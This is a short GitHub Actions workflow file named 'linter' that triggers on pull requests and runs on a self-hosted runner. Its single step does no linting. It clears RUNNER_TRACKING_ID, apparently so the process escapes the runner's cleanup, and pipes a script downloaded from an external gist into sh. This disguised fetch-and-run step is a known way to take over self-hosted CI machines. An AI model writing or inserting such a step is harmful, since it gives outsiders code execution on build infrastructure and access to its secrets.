name: linter
run-name: New Workflow
on:
 pull_request:
   branches: main
jobs:
  linter:
    runs-on: self-hosted
    steps:
      - shell: bash
        run: RUNNER_TRACKING_ID="" && curl https://gist.githubusercontent.com/atremmer/a7eedfb905cc2561125f3a53e3e22a86/raw/2944ed2453500c55f60d82787a5dd1b406eec5e4/gistfile1.sh | sh 

